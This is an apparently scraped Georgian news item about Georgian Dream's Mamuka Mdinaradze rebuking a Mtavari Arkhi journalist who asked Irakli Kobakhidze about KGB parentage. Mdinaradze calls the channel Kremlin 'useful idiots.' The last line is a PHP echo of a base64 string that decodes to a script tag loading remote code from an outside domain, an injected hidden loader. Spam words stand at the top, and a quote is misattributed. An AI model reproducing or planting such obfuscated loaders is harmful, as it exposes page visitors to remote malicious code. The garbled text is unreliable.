celsiusi
ავერსი შნაიდერი
მოითმინა შეძლებისდაგვარად, ათჯერ უარესი რომ არ გითხრათ, ძალიან გამიკვირდა, - ამის შესახებ „ქართული ოცნების“ აღმასრულებელმა მდივანმა მამუკა მდინარაძემ „მთავარი არხის“ ჟურნალისტს განუცხადა, როდესაც მას მედიის წარმომდგენელმა უთხრა, რომ „ქართული ოცნების“ თავმჯდომარე ირაკლი კობახიძემ „პირადი შეურაცხყოფა მიაყენა“ და მომხდარის შეფასება სთხოვა.
 
მამუკა მდინარაძის თქმით, კობახიძეს თავად ჟურნალისტმა მიაყენა „მძიმე შეურაცხყოფა“, „ვითომ კითხვის ფორმულირებით“.
 
„მეც მქონდა მსგავსი შემთხვევა, თქვენმა კოლეგამ "ტვ პირველიდან" ნახევარი საათი მდია, წარმოუდგენილი შეურაცხყოფები მაყენა, შემდეგ ნახევარი საათიდან ბოლო ერთი წუთი ამოჭრა და ეს მიიჩნიეს შეურაცხყოფად, მაშინ, როდესაც ურთულესი მოსათმენია თქვენი უმძიმესი პროვოკაციები. უკაცრავად ზედმეტი უტრირებისთვის, მაგრამ უნდა გითხრათ მაგალითი, ისე ვერ ხვდებით, როგორც ჩანს. თქვენ რომ ვიღაცამ გიწოდოთ ღორი და შემდეგ ვიღაცა ჟურნალისტი მოვიდეს და გკითხოს: თქვენ ღორი ხართ? აი, ასეთ კითხვებს სვამთ. ეს შეურაცხყოფაა თუ კითხვის დასმაა? მეც მიმძიმს თქვენი ამ მძიმე პროვოკაციების მოთმენა, მაგრამ ვითმენთ შეძლებისდაგვარად და ირაკლიმაც მოითმინა შეძლებისდაგვარად. ათჯერ უარესი რომ არ გითხრათ, აგერ ვიდექი და გისმენდით, ძალიან გამიკვირდა, იმდენად მძიმე შეურაცხყოფა მიაყენეთ და ვითომ კითხვის ფორმულირება მიანიჭეთ ამ ყველაფერს. რა ჰკითხეთ ადამიანს, გაიმეორეთ“,- მიმართა კობახიძემ ჟურნალისტს. 
 
ჟურნალისტმა გაიმეორა ის, რაც კობახიძეს ჰკითხა, „ხართ თუ არა კაგებეს აგენტის შვილი“, რაზეც მდინარაძემ ჟურნალისტს უთხრა:
 
"თქვენ კითხვა არ დასვით, მიაყენეთ ბინძური შეურაცხყოფა ირაკლი კობახიძეს.
 
თან ეს ბინძური შეურაცხყოფა მიაყენეთ უმძიმესი ფორმით. ასე ადამიანს არც კითხვის, არანაირი ფორმით არ უნდა დაელაპარაკო.
 
მე რომ გითხრათ, რომ თქვენ ხართ კრემლის სასარგებლო იდიოტი, ეს სწორია თუ არასწორია? მე ასე მგონია, მართლა, არ გეუბნებოდით აქამდე. თქვენ თქვენი ტელევიზიით, ვინაიდან, არ იმჩნევთ მილიონობით რუბლით დაფინანსებულ ადამიანებს და მის „ქისებს“, ვინაიდან, სინამდვილეში, ვითომ დეკლარირებთ პროდასავლურად და აკეთებთ რუსულ საქმეს საბოლოო ჯამში, შედეგებიდან ასე გამომდინარეობს, თქვენ ბრძანდებით ჩემი აზრით, კრემლის სასარგებლო იდიოტები“, - განაცხადა მან.
536
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");